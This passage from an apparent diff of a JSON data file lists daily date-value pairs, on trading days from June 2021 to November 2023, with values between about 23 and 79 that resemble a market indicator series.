"2021-06-18", + 61.96419491543628 + ], + [ + "2021-06-21", + 64.30017433780066 + ], + [ + "2021-06-22", + 67.54016430856862 + ], + [ + "2021-06-23", + 67.7073130365776 + ], + [ + "2021-06-24", + 69.82374090802259 + ], + [ + "2021-06-25", + 68.85178137411152 + ], + [ + "2021-06-28", + 72.87120866951454 + ], + [ + "2021-06-29", + 73.96109177116739 + ], + [ + "2021-06-30", + 72.58706309101024 + ], + [ + "2021-07-01", + 72.72347662928014 + ], + [ + "2021-07-02", + 76.40029185991497 + ], + [ + "2021-07-06", + 77.63653015890817 + ], + [ + "2021-07-07", + 78.23857696986397 + ], + [ + "2021-07-08", + 72.23229214289918 + ], + [ + "2021-07-09", + 74.40644807766805 + ], + [ + "2021-07-12", + 75.69638300602185 + ], + [ + "2021-07-13", + 75.69638300602186 + ], + [ + "2021-07-14", + 76.33412263643355 + ], + [ + "2021-07-15", + 68.71619360337529 + ], + [ + "2021-07-16", + 61.18631144421222 + ], + [ + "2021-07-19", + 54.70812603359066 + ], + [ + "2021-07-20", + 60.966382503809854 + ], + [ + "2021-07-21", + 64.51639942927717 + ], + [ + "2021-07-22", + 67.28128788041187 + ], + [ + "2021-07-23", + 71.52975024964621 + ], + [ + "2021-07-26", + 71.79882480124832 + ], + [ + "2021-07-27", + 62.84350053268119 + ], + [ + "2021-07-28", + 64.48833198435833 + ], + [ + "2021-07-29", + 65.25736866290757 + ], + [ + "2021-07-30", + 61.07238567553689 + ], + [ + "2021-08-02", + 61.11469598994497 + ], + [ + "2021-08-03", + 64.19269233837517 + ], + [ + "2021-08-04", + 64.91012048682103 + ], + [ + "2021-08-05", + 67.95012892823647 + ], + [ + "2021-08-06", + 63.81052051086799 + ], + [ + "2021-08-09", + 64.7805169877682 + ], + [ + "2021-08-10", + 59.97010689840783 + ], + [ + "2021-08-11", + 58.41297681429681 + ], + [ + "2021-08-12", + 60.71456390527855 + ], + [ + "2021-08-13", + 62.876811663617644 + ], + [ + "2021-08-16", + 63.14786679528263 + ], + [ + "2021-08-17", + 54.454309094592986 + ], + [ + "2021-08-18", + 46.92001763805888 + ], + [ + "2021-08-19", + 50.58079398012657 + ], + [ + "2021-08-20", + 57.39750403664496 + ], + [ + "2021-08-23", + 64.98574560714843 + ], + [ + "2021-08-24", + 66.32454957300935 + ], + [ + "2021-08-25", + 66.83971066739997 + ], + [ + "2021-08-26", + 61.25516981685048 + ], + [ + "2021-08-27", + 65.91926668499167 + ], + [ + "2021-08-30", + 70.3936483408786 + ], + [ + "2021-08-31", + 69.67011842138047 + ], + [ + "2021-09-01", + 70.33749958884928 + ], + [ + "2021-09-02", + 69.86430737626199 + ], + [ + "2021-09-03", + 71.21920292630585 + ], + [ + "2021-09-07", + 71.84811871180308 + ], + [ + "2021-09-08", + 67.91106635011081 + ], + [ + "2021-09-09", + 64.18086956307411 + ], + [ + "2021-09-10", + 56.79455529218046 + ], + [ + "2021-09-13", + 56.16599676557467 + ], + [ + "2021-09-14", + 53.540648971566185 + ], + [ + "2021-09-15", + 58.93163958876515 + ], + [ + "2021-09-16", + 59.40419877101468 + ], + [ + "2021-09-17", + 48.94862099510424 + ], + [ + "2021-09-20", + 36.891483485279124 + ], + [ + "2021-09-21", + 37.85299950176007 + ], + [ + "2021-09-22", + 44.743109797440546 + ], + [ + "2021-09-23", + 50.62137061404416 + ], + [ + "2021-09-24", + 51.195317180325496 + ], + [ + "2021-09-27", + 46.26499804287106 + ], + [ + "2021-09-28", + 33.90037513247897 + ], + [ + "2021-09-29", + 33.35983691769624 + ], + [ + "2021-09-30", + 32.125678697936536 + ], + [ + "2021-10-01", + 36.38812214005615 + ], + [ + "2021-10-04", + 29.576418761454065 + ], + [ + "2021-10-05", + 37.50863465900561 + ], + [ + "2021-10-06", + 40.954112397853315 + ], + [ + "2021-10-07", + 45.608337073117184 + ], + [ + "2021-10-08", + 43.57932703374307 + ], + [ + "2021-10-11", + 40.602353470927106 + ], + [ + "2021-10-12", + 39.2978144258677 + ], + [ + "2021-10-13", + 43.75090805848233 + ], + [ + "2021-10-14", + 52.45833993120707 + ], + [ + "2021-10-15", + 55.068129114235106 + ], + [ + "2021-10-18", + 58.96430081844929 + ], + [ + "2021-10-19", + 61.68404699383822 + ], + [ + "2021-10-20", + 60.928493734927756 + ], + [ + "2021-10-21", + 63.19752070239752 + ], + [ + "2021-10-22", + 58.16201047485348 + ], + [ + "2021-10-25", + 62.092073803374525 + ], + [ + "2021-10-26", + 63.24717696731051 + ], + [ + "2021-10-27", + 64.11796670119224 + ], + [ + "2021-10-28", + 68.02978777772829 + ], + [ + "2021-10-29", + 69.62684352344485 + ], + [ + "2021-11-01", + 70.72672756723438 + ], + [ + "2021-11-02", + 72.06380143970219 + ], + [ + "2021-11-03", + 75.17669548961761 + ], + [ + "2021-11-04", + 78.3474667288033 + ], + [ + "2021-11-05", + 78.5696939664484 + ], + [ + "2021-11-08", + 77.35440001390218 + ], + [ + "2021-11-09", + 71.32646046346366 + ], + [ + "2021-11-10", + 60.551244125884445 + ], + [ + "2021-11-11", + 61.70926616999927 + ], + [ + "2021-11-12", + 65.82106689208175 + ], + [ + "2021-11-15", + 65.65477217920522 + ], + [ + "2021-11-16", + 68.34345977498612 + ], + [ + "2021-11-17", + 68.54157256607814 + ], + [ + "2021-11-18", + 72.21687545039286 + ], + [ + "2021-11-19", + 73.99562235218778 + ], + [ + "2021-11-22", + 64.66104176105483 + ], + [ + "2021-11-23", + 61.42268637296823 + ], + [ + "2021-11-24", + 62.83259309997798 + ], + [ + "2021-11-26", + 50.9821400680284 + ], + [ + "2021-11-29", + 60.0862788437757 + ], + [ + "2021-11-30", + 52.786263499662866 + ], + [ + "2021-12-01", + 45.92757840462744 + ], + [ + "2021-12-02", + 48.90483089617499 + ], + [ + "2021-12-03", + 42.745529018498694 + ], + [ + "2021-12-06", + 46.05825308109332 + ], + [ + "2021-12-07", + 56.359991184518975 + ], + [ + "2021-12-08", + 57.69168429905404 + ], + [ + "2021-12-09", + 52.041786293137136 + ], + [ + "2021-12-10", + 55.460964119573944 + ], + [ + "2021-12-13", + 50.275127382061484 + ], + [ + "2021-12-14", + 46.93785589290723 + ], + [ + "2021-12-15", + 54.09161689122449 + ], + [ + "2021-12-16", + 46.3310446313148 + ], + [ + "2021-12-17", + 45.01626328071826 + ], + [ + "2021-12-20", + 42.50343576497416 + ], + [ + "2021-12-21", + 49.44693366426163 + ], + [ + "2021-12-22", + 52.857984487646554 + ], + [ + "2021-12-23", + 54.91085120324026 + ], + [ + "2021-12-27", + 59.142944721953725 + ], + [ + "2021-12-28", + 57.4865070997747 + ], + [ + "2021-12-29", + 57.43092029973047 + ], + [ + "2021-12-30", + 56.25943613063869 + ], + [ + "2021-12-31", + 53.79727921471488 + ], + [ + "2022-01-03", + 56.90855759500005 + ], + [ + "2022-01-04", + 51.7986041353217 + ], + [ + "2022-01-05", + 42.24772505115775 + ], + [ + "2022-01-06", + 42.062559314296664 + ], + [ + "2022-01-07", + 39.21129090016362 + ], + [ + "2022-01-10", + 39.47684684657483 + ], + [ + "2022-01-11", + 45.34844074835002 + ], + [ + "2022-01-12", + 46.83673538508349 + ], + [ + "2022-01-13", + 39.499993759216686 + ], + [ + "2022-01-14", + 41.877945006507105 + ], + [ + "2022-01-18", + 35.78122076179332 + ], + [ + "2022-01-19", + 33.520234552457865 + ], + [ + "2022-01-20", + 31.049063125860627 + ], + [ + "2022-01-21", + 26.599331887067052 + ], + [ + "2022-01-24", + 28.37393128306411 + ], + [ + "2022-01-25", + 25.05556741870062 + ], + [ + "2022-01-26", + 24.84925901344309 + ], + [ + "2022-01-27", + 23.509352099617317 + ], + [ + "2022-01-28", + 35.1254920086529 + ], + [ + "2022-01-31", + 44.64403705589501 + ], + [ + "2022-02-01", + 46.50002710042298 + ], + [ + "2022-02-02", + 48.72614122928374 + ], + [ + "2022-02-03", + 39.76306524076169 + ], + [ + "2022-02-04", + 43.12644407673849 + ], + [ + "2022-02-07", + 41.5145025318412 + ], + [ + "2022-02-08", + 44.6037456595048 + ], + [ + "2022-02-09", + 50.025646624245205 + ], + [ + "2022-02-10", + 44.867636088635415 + ], + [ + "2022-02-11", + 38.94385734496466 + ], + [ + "2022-02-14", + 39.27040978335331 + ], + [ + "2022-02-15", + 45.56982729330825 + ], + [ + "2022-02-16", + 45.516827566644395 + ], + [ + "2022-02-17", + 39.67374404624641 + ], + [ + "2022-02-18", + 37.73290324122747 + ], + [ + "2022-02-22", + 36.07825820295354 + ], + [ + "2022-02-23", + 32.23483889282262 + ], + [ + "2022-02-24", + 40.90172456911352 + ], + [ + "2022-02-25", + 44.54478416312568 + ], + [ + "2022-02-28", + 45.25376171668509 + ], + [ + "2022-03-01", + 42.25452487458501 + ], + [ + "2022-03-02", + 46.38404431337092 + ], + [ + "2022-03-03", + 43.485180431824396 + ], + [ + "2022-03-04", + 40.74299485202457 + ], + [ + "2022-03-07", + 34.8133315255498 + ], + [ + "2022-03-08", + 34.16342991506494 + ], + [ + "2022-03-09", + 42.99786621844782 + ], + [ + "2022-03-10", + 41.099720254489576 + ], + [ + "2022-03-11", + 37.78253246688016 + ], + [ + "2022-03-14", + 35.022084001006675 + ], + [ + "2022-03-15", + 42.29538522851595 + ], + [ + "2022-03-16", + 49.690873444279504 + ], + [ + "2022-03-17", + 51.93653155407596 + ], + [ + "2022-03-18", + 55.58969247385536 + ], + [ + "2022-03-21", + 54.96606563053017 + ], + [ + "2022-03-22", + 58.5004348856752 + ], + [ + "2022-03-23", + 55.0322090173197 + ], + [ + "2022-03-24", + 59.02042315865654 + ], + [ + "2022-03-25", + 58.8049610296236 + ], + [ + "2022-03-28", + 61.602819496181084 + ], + [ + "2022-03-29", + 64.53289110116637 + ], + [ + "2022-03-30", + 61.246896727142804 + ], + [ + "2022-03-31", + 57.733443360697436 + ], + [ + "2022-04-01", + 57.197676039247 + ], + [ + "2022-04-04", + 61.366984221357285 + ], + [ + "2022-04-05", + 55.014803301382464 + ], + [ + "2022-04-06", + 49.716063221457325 + ], + [ + "2022-04-07", + 50.2687739107383 + ], + [ + "2022-04-08", + 46.991092191118845 + ], + [ + "2022-04-11", + 42.06253985844652 + ], + [ + "2022-04-12", + 41.25023566395148 + ], + [ + "2022-04-13", + 46.57411442994896 + ], + [ + "2022-04-14", + 41.882591807877944 + ], + [ + "2022-04-18", + 42.08881965734098 + ], + [ + "2022-04-19", + 47.88725829825506 + ], + [ + "2022-04-20", + 44.67374684833129 + ], + [ + "2022-04-21", + 40.57444151178154 + ], + [ + "2022-04-22", + 36.147281588597615 + ], + [ + "2022-04-25", + 39.54109262271273 + ], + [ + "2022-04-26", + 33.78579150623527 + ], + [ + "2022-04-27", + 33.62479839035849 + ], + [ + "2022-04-28", + 42.37912906235849 + ], + [ + "2022-04-29", + 35.722174317738904 + ], + [ + "2022-05-02", + 39.35715126986258 + ], + [ + "2022-05-03", + 39.59633341411177 + ], + [ + "2022-05-04", + 46.76456745753685 + ], + [ + "2022-05-05", + 39.074687219134255 + ], + [ + "2022-05-06", + 37.571654896635714 + ], + [ + "2022-05-09", + 33.14179124531174 + ], + [ + "2022-05-10", + 35.58205894009416 + ], + [ + "2022-05-11", + 32.432117802694805 + ], + [ + "2022-05-12", + 32.194675365139986 + ], + [ + "2022-05-13", + 39.63660053941135 + ], + [ + "2022-05-16", + 38.17302300089359 + ], + [ + "2022-05-17", + 43.16447208719871 + ], + [ + "2022-05-18", + 36.9227304911634 + ], + [ + "2022-05-19", + 36.335430819867554 + ], + [ + "2022-05-20", + 35.97983585681364 + ], + [ + "2022-05-23", + 39.386693751594606 + ], + [ + "2022-05-24", + 36.655799296664 + ], + [ + "2022-05-25", + 39.56308611837464 + ], + [ + "2022-05-26", + 45.01845521308022 + ], + [ + "2022-05-27", + 50.80772972492503 + ], + [ + "2022-05-31", + 50.3287397557747 + ], + [ + "2022-06-01", + 48.947007798985446 + ], + [ + "2022-06-02", + 53.95111535763767 + ], + [ + "2022-06-03", + 48.91137618748208 + ], + [ + "2022-06-06", + 49.54425400280699 + ], + [ + "2022-06-07", + 51.23463348619838 + ], + [ + "2022-06-08", + 49.724930134180916 + ], + [ + "2022-06-09", + 44.50648323439435 + ], + [ + "2022-06-10", + 38.87567747360507 + ], + [ + "2022-06-13", + 33.13425635703523 + ], + [ + "2022-06-14", + 33.52784372353055 + ], + [ + "2022-06-15", + 38.868076039286045 + ], + [ + "2022-06-16", + 33.997159565669705 + ], + [ + "2022-06-17", + 36.47663163008422 + ], + [ + "2022-06-21", + 41.45108445976924 + ], + [ + "2022-06-22", + 41.244962112213535 + ], + [ + "2022-06-23", + 44.287339310990134 + ], + [ + "2022-06-24", + 50.705894300966875 + ], + [ + "2022-06-27", + 49.350788875507234 + ], + [ + "2022-06-28", + 44.11375168417185 + ], + [ + "2022-06-29", + 44.29951887471856 + ], + [ + "2022-06-30", + 42.25197306881469 + ], + [ + "2022-07-01", + 43.724155931270985 + ], + [ + "2022-07-05", + 47.488115659924595 + ], + [ + "2022-07-06", + 48.89058138812849 + ], + [ + "2022-07-07", + 53.392872931514326 + ], + [ + "2022-07-08", + 53.65607811358624 + ], + [ + "2022-07-11", + 48.61364557304016 + ], + [ + "2022-07-12", + 46.524257556878915 + ], + [ + "2022-07-13", + 46.07490654624855 + ], + [ + "2022-07-14", + 47.02751559979407 + ], + [ + "2022-07-15", + 51.71077164958563 + ], + [ + "2022-07-18", + 49.47336274382071 + ], + [ + "2022-07-19", + 56.7371592275237 + ], + [ + "2022-07-20", + 60.02616361852327 + ], + [ + "2022-07-21", + 62.82530098939176 + ], + [ + "2022-07-22", + 57.4566160332535 + ], + [ + "2022-07-25", + 55.81738449827088 + ], + [ + "2022-07-26", + 50.49568301009237 + ], + [ + "2022-07-27", + 59.305542109238964 + ], + [ + "2022-07-28", + 61.10325320792668 + ], + [ + "2022-07-29", + 64.30175647181073 + ], + [ + "2022-08-01", + 64.11078663763963 + ], + [ + "2022-08-02", + 63.112488023386895 + ], + [ + "2022-08-03", + 67.99965793336116 + ], + [ + "2022-08-04", + 68.78528119940034 + ], + [ + "2022-08-05", + 65.73511775472235 + ], + [ + "2022-08-08", + 64.52579650906193 + ], + [ + "2022-08-09", + 60.352398814157326 + ], + [ + "2022-08-10", + 66.1078285333157 + ], + [ + "2022-08-11", + 64.01579721735214 + ], + [ + "2022-08-12", + 67.76298450946044 + ], + [ + "2022-08-15", + 69.2234187738537 + ], + [ + "2022-08-16", + 68.25063704759695 + ], + [ + "2022-08-17", + 63.57586092267359 + ], + [ + "2022-08-18", + 64.12742092294661 + ], + [ + "2022-08-19", + 56.62334244390238 + ], + [ + "2022-08-22", + 48.52678887781354 + ], + [ + "2022-08-23", + 48.29932353894997 + ], + [ + "2022-08-24", + 49.197001325069465 + ], + [ + "2022-08-25", + 54.414696942765815 + ], + [ + "2022-08-26", + 43.15471323619508 + ], + [ + "2022-08-29", + 41.04551082376912 + ], + [ + "2022-08-30", + 38.76279261596359 + ], + [ + "2022-08-31", + 37.60027664403001 + ], + [ + "2022-09-01", + 37.74967651288684 + ], + [ + "2022-09-02", + 34.82862443873323 + ], + [ + "2022-09-06", + 33.432304435165065 + ], + [ + "2022-09-07", + 40.59442098868846 + ], + [ + "2022-09-08", + 42.34351375039499 + ], + [ + "2022-09-09", + 49.174629872770396 + ], + [ + "2022-09-12", + 52.538927877064324 + ], + [ + "2022-09-13", + 39.420188869316966 + ], + [ + "2022-09-14", + 41.56860507258168 + ], + [ + "2022-09-15", + 38.46054633853553 + ], + [ + "2022-09-16", + 37.373944596527025 + ], + [ + "2022-09-19", + 39.696290963592354 + ], + [ + "2022-09-20", + 38.12570726771966 + ], + [ + "2022-09-21", + 34.81953150893416 + ], + [ + "2022-09-22", + 32.754667266617346 + ], + [ + "2022-09-23", + 30.231967318779837 + ], + [ + "2022-09-26", + 29.617810944284344 + ], + [ + "2022-09-27", + 29.766123347058624 + ], + [ + "2022-09-28", + 36.874215670509784 + ], + [ + "2022-09-29", + 31.75827520410273 + ], + [ + "2022-09-30", + 29.260752936310624 + ], + [ + "2022-10-03", + 36.56731501650342 + ], + [ + "2022-10-04", + 44.96397292721267 + ], + [ + "2022-10-05", + 44.85248651516636 + ], + [ + "2022-10-06", + 43.14680665929445 + ], + [ + "2022-10-07", + 36.05631546512657 + ], + [ + "2022-10-10", + 34.514940797204986 + ], + [ + "2022-10-11", + 32.480384580980314 + ], + [ + "2022-10-12", + 32.429767080493505 + ], + [ + "2022-10-13", + 39.392473429018345 + ], + [ + "2022-10-14", + 34.38711202990932 + ], + [ + "2022-10-17", + 42.73685911269731 + ], + [ + "2022-10-18", + 44.6146494521135 + ], + [ + "2022-10-19", + 43.89413359629969 + ], + [ + "2022-10-20", + 42.85527578978596 + ], + [ + "2022-10-21", + 48.820144638646084 + ], + [ + "2022-10-24", + 51.441163939043214 + ], + [ + "2022-10-25", + 56.04922484610232 + ], + [ + "2022-10-26", + 50.43017354034932 + ], + [ + "2022-10-27", + 46.394378400406495 + ], + [ + "2022-10-28", + 53.06894599462299 + ], + [ + "2022-10-31", + 50.42120789013268 + ], + [ + "2022-11-01", + 48.17320349819464 + ], + [ + "2022-11-02", + 41.54924870838074 + ], + [ + "2022-11-03", + 38.41822760856764 + ], + [ + "2022-11-04", + 42.20476936015601 + ], + [ + "2022-11-07", + 44.74593712401305 + ], + [ + "2022-11-08", + 46.445193338449016 + ], + [ + "2022-11-09", + 42.007416637514254 + ], + [ + "2022-11-10", + 56.11380835499619 + ], + [ + "2022-11-11", + 58.99416220633765 + ], + [ + "2022-11-14", + 57.0440141856922 + ], + [ + "2022-11-15", + 59.314331590704235 + ], + [ + "2022-11-16", + 56.120102731997704 + ], + [ + "2022-11-17", + 55.605770586062526 + ], + [ + "2022-11-18", + 55.61268765441401 + ], + [ + "2022-11-21", + 52.99343303434411 + ], + [ + "2022-11-22", + 56.080265791233195 + ], + [ + "2022-11-23", + 58.171334521436904 + ], + [ + "2022-11-25", + 56.26160475602437 + ], + [ + "2022-11-28", + 52.17424507251297 + ], + [ + "2022-11-29", + 50.17877529656623 + ], + [ + "2022-11-30", + 60.02065843579145 + ], + [ + "2022-12-01", + 60.25866550411028 + ], + [ + "2022-12-02", + 59.02887317044456 + ], + [ + "2022-12-05", + 54.04424367619495 + ], + [ + "2022-12-06", + 48.671559243362 + ], + [ + "2022-12-07", + 47.686465952019915 + ], + [ + "2022-12-08", + 50.783367005025696 + ], + [ + "2022-12-09", + 49.07756201691776 + ], + [ + "2022-12-12", + 52.44233254848701 + ], + [ + "2022-12-13", + 55.20645712562851 + ], + [ + "2022-12-14", + 52.898376095226816 + ], + [ + "2022-12-15", + 43.9940683148413 + ], + [ + "2022-12-16", + 41.909215304063785 + ], + [ + "2022-12-19", + 39.00319708076741 + ], + [ + "2022-12-20", + 38.84476684244021 + ], + [ + "2022-12-21", + 43.450557834133896 + ], + [ + "2022-12-22", + 38.15560700890498 + ], + [ + "2022-12-23", + 38.87496128454045 + ], + [ + "2022-12-27", + 36.031175279965616 + ], + [ + "2022-12-28", + 33.59467677965684 + ], + [ + "2022-12-29", + 41.37304288489102 + ], + [ + "2022-12-30", + 41.24171524972162 + ], + [ + "2023-01-03", + 39.71485462962136 + ], + [ + "2023-01-04", + 41.351604199643866 + ], + [ + "2023-01-05", + 37.71102989292675 + ], + [ + "2023-01-06", + 46.51263859019592 + ], + [ + "2023-01-09", + 48.40482154345478 + ], + [ + "2023-01-10", + 50.868142839716086 + ], + [ + "2023-01-11", + 55.57616036512596 + ], + [ + "2023-01-12", + 56.98678644023755 + ], + [ + "2023-01-13", + 58.79061190685158 + ], + [ + "2023-01-17", + 59.33584100138596 + ], + [ + "2023-01-18", + 54.3624624026 + ], + [ + "2023-01-19", + 50.933222085903104 + ], + [ + "2023-01-20", + 58.676298872758274 + ], + [ + "2023-01-23", + 63.80618204881444 + ], + [ + "2023-01-24", + 63.01471323850441 + ], + [ + "2023-01-25", + 62.114699578907285 + ], + [ + "2023-01-26", + 66.61596588269528 + ], + [ + "2023-01-27", + 68.70055139413213 + ], + [ + "2023-01-30", + 60.37249369551497 + ], + [ + "2023-01-31", + 63.80404685626087 + ], + [ + "2023-02-01", + 68.11093519818566 + ], + [ + "2023-02-02", + 73.85436582584414 + ], + [ + "2023-02-03", + 67.17120374928832 + ], + [ + "2023-02-06", + 64.24424199745658 + ], + [ + "2023-02-07", + 67.90222473292923 + ], + [ + "2023-02-08", + 61.92563814008648 + ], + [ + "2023-02-09", + 59.18673467963746 + ], + [ + "2023-02-10", + 57.182025110468054 + ], + [ + "2023-02-13", + 60.660753992580446 + ], + [ + "2023-02-14", + 62.210657231095475 + ], + [ + "2023-02-15", + 63.81420660732559 + ], + [ + "2023-02-16", + 57.34636804444889 + ], + [ + "2023-02-17", + 55.126194378269666 + ], + [ + "2023-02-21", + 48.40266709429427 + ], + [ + "2023-02-22", + 48.61092678249726 + ], + [ + "2023-02-23", + 51.09442554078353 + ], + [ + "2023-02-24", + 46.422246474267034 + ], + [ + "2023-02-27", + 48.55269660176432 + ], + [ + "2023-02-28", + 48.17764051993156 + ], + [ + "2023-03-01", + 45.810452047033884 + ], + [ + "2023-03-02", + 48.58843855353665 + ], + [ + "2023-03-03", + 54.86464941796546 + ], + [ + "2023-03-06", + 55.1944992713495 + ], + [ + "2023-03-07", + 50.86093761497518 + ], + [ + "2023-03-08", + 52.476997278962195 + ], + [ + "2023-03-09", + 46.70908345630628 + ], + [ + "2023-03-10", + 42.68475855322763 + ], + [ + "2023-03-13", + 45.326121794705834 + ], + [ + "2023-03-14", + 52.65999105294321 + ], + [ + "2023-03-15", + 54.20489088297322 + ], + [ + "2023-03-16", + 61.109095221942596 + ], + [ + "2023-03-17", + 59.33635434427318 + ], + [ + "2023-03-20", + 60.26413143080221 + ], + [ + "2023-03-21", + 63.85130531581287 + ], + [ + "2023-03-22", + 58.371311998889055 + ], + [ + "2023-03-23", + 61.43725187131861 + ], + [ + "2023-03-24", + 62.37448023163724 + ], + [ + "2023-03-27", + 59.466402264270386 + ], + [ + "2023-03-28", + 57.25308437192617 + ], + [ + "2023-03-29", + 62.399395057604025 + ], + [ + "2023-03-30", + 64.81087383876917 + ], + [ + "2023-03-31", + 68.65120574681796 + ], + [ + "2023-04-03", + 67.47297229642757 + ], + [ + "2023-04-04", + 65.78939623770364 + ], + [ + "2023-04-05", + 61.007988966107696 + ], + [ + "2023-04-06", + 62.967847333630175 + ], + [ + "2023-04-10", + 62.68113970701629 + ], + [ + "2023-04-11", + 59.38095263124246 + ], + [ + "2023-04-12", + 55.10758997554812 + ], + [ + "2023-04-13", + 61.63968183340203 + ], + [ + "2023-04-14", + 60.70847542793994 + ], + [ + "2023-04-17", + 60.99401353296942 + ], + [ + "2023-04-18", + 61.01661546712972 + ], + [ + "2023-04-19", + 60.73249563799421 + ], + [ + "2023-04-20", + 56.16809421454759 + ], + [ + "2023-04-21", + 56.64458608532958 + ], + [ + "2023-04-24", + 55.348521272530796 + ], + [ + "2023-04-25", + 45.27442423415121 + ], + [ + "2023-04-26", + 48.461154931384904 + ], + [ + "2023-04-27", + 59.82491096516489 + ], + [ + "2023-04-28", + 62.16609684970614 + ], + [ + "2023-05-01", + 61.51969022539106 + ], + [ + "2023-05-02", + 56.69796761477246 + ], + [ + "2023-05-03", + 53.348810677078596 + ], + [ + "2023-05-04", + 51.5901730093961 + ], + [ + "2023-05-05", + 60.09118205746345 + ], + [ + "2023-05-08", + 60.96990981421818 + ], + [ + "2023-05-09", + 57.47754267570553 + ], + [ + "2023-05-10", + 61.529245439312426 + ], + [ + "2023-05-11", + 62.688751444833706 + ], + [ + "2023-05-12", + 60.52042213358286 + ], + [ + "2023-05-15", + 62.61527211682157 + ], + [ + "2023-05-16", + 63.058922521211784 + ], + [ + "2023-05-17", + 67.50475402947964 + ], + [ + "2023-05-18", + 72.94947013682886 + ], + [ + "2023-05-19", + 71.35830264811514 + ], + [ + "2023-05-22", + 72.324986306135 + ], + [ + "2023-05-23", + 63.5734720776719 + ], + [ + "2023-05-24", + 60.42755049231277 + ], + [ + "2023-05-25", + 68.38005706631736 + ], + [ + "2023-05-26", + 74.35062060212326 + ], + [ + "2023-05-30", + 75.26613981200924 + ], + [ + "2023-05-31", + 71.79050972907997 + ], + [ + "2023-06-01", + 74.36574058468065 + ], + [ + "2023-06-02", + 75.92036643838433 + ], + [ + "2023-06-05", + 76.06837783351943 + ], + [ + "2023-06-06", + 75.94770491650931 + ], + [ + "2023-06-07", + 64.83552379014215 + ], + [ + "2023-06-08", + 68.41518295937328 + ], + [ + "2023-06-09", + 69.45905512921526 + ], + [ + "2023-06-12", + 73.62444345926912 + ], + [ + "2023-06-13", + 75.30196153825221 + ], + [ + "2023-06-14", + 76.81543915938602 + ], + [ + "2023-06-15", + 79.09402909696561 + ], + [ + "2023-06-16", + 74.85992789332106 + ], + [ + "2023-06-20", + 73.896859413129 + ], + [ + "2023-06-21", + 65.29757381664413 + ], + [ + "2023-06-22", + 68.65250628108085 + ], + [ + "2023-06-23", + 63.0701333908148 + ], + [ + "2023-06-26", + 56.451750387252545 + ], + [ + "2023-06-27", + 61.90016557473242 + ], + [ + "2023-06-28", + 62.48375336045847 + ], + [ + "2023-06-29", + 61.441680124553265 + ], + [ + "2023-06-30", + 66.1180764513902 + ], + [ + "2023-07-03", + 66.79068315064546 + ], + [ + "2023-07-05", + 66.77429457932314 + ], + [ + "2023-07-06", + 62.13795555557492 + ], + [ + "2023-07-07", + 60.19091770909019 + ], + [ + "2023-07-10", + 60.322550160076425 + ], + [ + "2023-07-11", + 62.34611174329139 + ], + [ + "2023-07-12", + 67.0019024318824 + ], + [ + "2023-07-13", + 72.06544453360533 + ], + [ + "2023-07-14", + 71.91537947862865 + ], + [ + "2023-07-17", + 74.45269931041645 + ], + [ + "2023-07-18", + 76.47636926541416 + ], + [ + "2023-07-19", + 76.28928416760866 + ], + [ + "2023-07-20", + 60.533048395027734 + ], + [ + "2023-07-21", + 58.86875294350579 + ], + [ + "2023-07-24", + 59.50540961667576 + ], + [ + "2023-07-25", + 62.18440155404531 + ], + [ + "2023-07-26", + 60.06971373184749 + ], + [ + "2023-07-27", + 58.53836236644379 + ], + [ + "2023-07-28", + 65.71302796482797 + ], + [ + "2023-07-31", + 65.89826932028382 + ], + [ + "2023-08-01", + 64.2348653185418 + ], + [ + "2023-08-02", + 51.11924342051281 + ], + [ + "2023-08-03", + 50.32870578317773 + ], + [ + "2023-08-04", + 47.9974072598372 + ], + [ + "2023-08-07", + 52.28204669202921 + ], + [ + "2023-08-08", + 47.97151660319966 + ], + [ + "2023-08-09", + 43.06838667893126 + ], + [ + "2023-08-10", + 44.09156690738811 + ], + [ + "2023-08-11", + 41.327414068049 + ], + [ + "2023-08-14", + 47.52363363242188 + ], + [ + "2023-08-15", + 42.86242792458669 + ], + [ + "2023-08-16", + 38.81466221327696 + ], + [ + "2023-08-17", + 35.16466745472337 + ], + [ + "2023-08-18", + 34.7646120147151 + ], + [ + "2023-08-21", + 43.62169073901371 + ], + [ + "2023-08-22", + 43.054307817462075 + ], + [ + "2023-08-23", + 50.66796098989136 + ], + [ + "2023-08-24", + 42.2845244992104 + ], + [ + "2023-08-25", + 45.71709334060606 + ], + [ + "2023-08-28", + 48.91866896198211 + ], + [ + "2023-08-29", + 56.91816272972104 + ], + [ + "2023-08-30", + 58.73411926135737 + ], + [ + "2023-08-31", + 59.72263196655176 + ], + [ + "2023-09-01", + 59.18213422735013 + ], + [ + "2023-09-05", + 59.653954877465885 + ], + [ + "2023-09-06", + 54.911868817831525 + ], + [ + "2023-09-07", + 51.37236209108002 + ], + [ + "2023-09-08", + 52.01859459248024 + ], + [ + "2023-09-11", + 57.19099213640806 + ], + [ + "2023-09-12", + 51.49842790979573 + ], + [ + "2023-09-13", + 53.20248156855703 + ], + [ + "2023-09-14", + 56.73071398283563 + ], + [ + "2023-09-15", + 48.42970194675755 + ], + [ + "2023-09-18", + 48.91139233216411 + ], + [ + "2023-09-19", + 47.92473277239149 + ], + [ + "2023-09-20", + 41.79809938014832 + ], + [ + "2023-09-21", + 35.64739490366867 + ], + [ + "2023-09-22", + 35.7237604696504 + ], + [ + "2023-09-25", + 38.39605382856523 + ], + [ + "2023-09-26", + 33.61511788964246 + ], + [ + "2023-09-27", + 34.9556503768201 + ], + [ + "2023-09-28", + 39.652141909243056 + ], + [ + "2023-09-29", + 40.060112184048755 + ], + [ + "2023-10-02", + 44.691253053839084 + ], + [ + "2023-10-03", + 37.988918616491205 + ], + [ + "2023-10-04", + 44.782803742051705 + ], + [ + "2023-10-05", + 43.652471634644066 + ], + [ + "2023-10-06", + 51.176922470059445 + ], + [ + "2023-10-09", + 53.25722916631747 + ], + [ + "2023-10-10", + 55.48650090126187 + ], + [ + "2023-10-11", + 58.263781609227806 + ], + [ + "2023-10-12", + 56.40484227027139 + ], + [ + "2023-10-13", + 50.188814622944804 + ], + [ + "2023-10-16", + 54.93870945795311 + ], + [ + "2023-10-17", + 53.33410816664562 + ], + [ + "2023-10-18", + 47.38457501349909 + ], + [ + "2023-10-19", + 43.68983744964796 + ], + [ + "2023-10-20", + 38.57405178870269 + ], + [ + "2023-10-23", + 40.07959307902493 + ], + [ + "2023-10-24", + 44.79189754310667 + ], + [ + "2023-10-25", + 36.86101755729465 + ], + [ + "2023-10-26", + 32.19557789326879 + ], + [ + "2023-10-27", + 34.404183060332144 + ], + [ + "2023-10-30", + 39.41424576944975 + ], + [ + "2023-10-31", + 41.48069589697909 + ], + [ + "2023-11-01", + 48.39344063114026 + ], + [ + "2023-11-02", + 54.546092842317385 + ], + [ + "2023-11-03", + 58.09175041735141 + ], + [ + 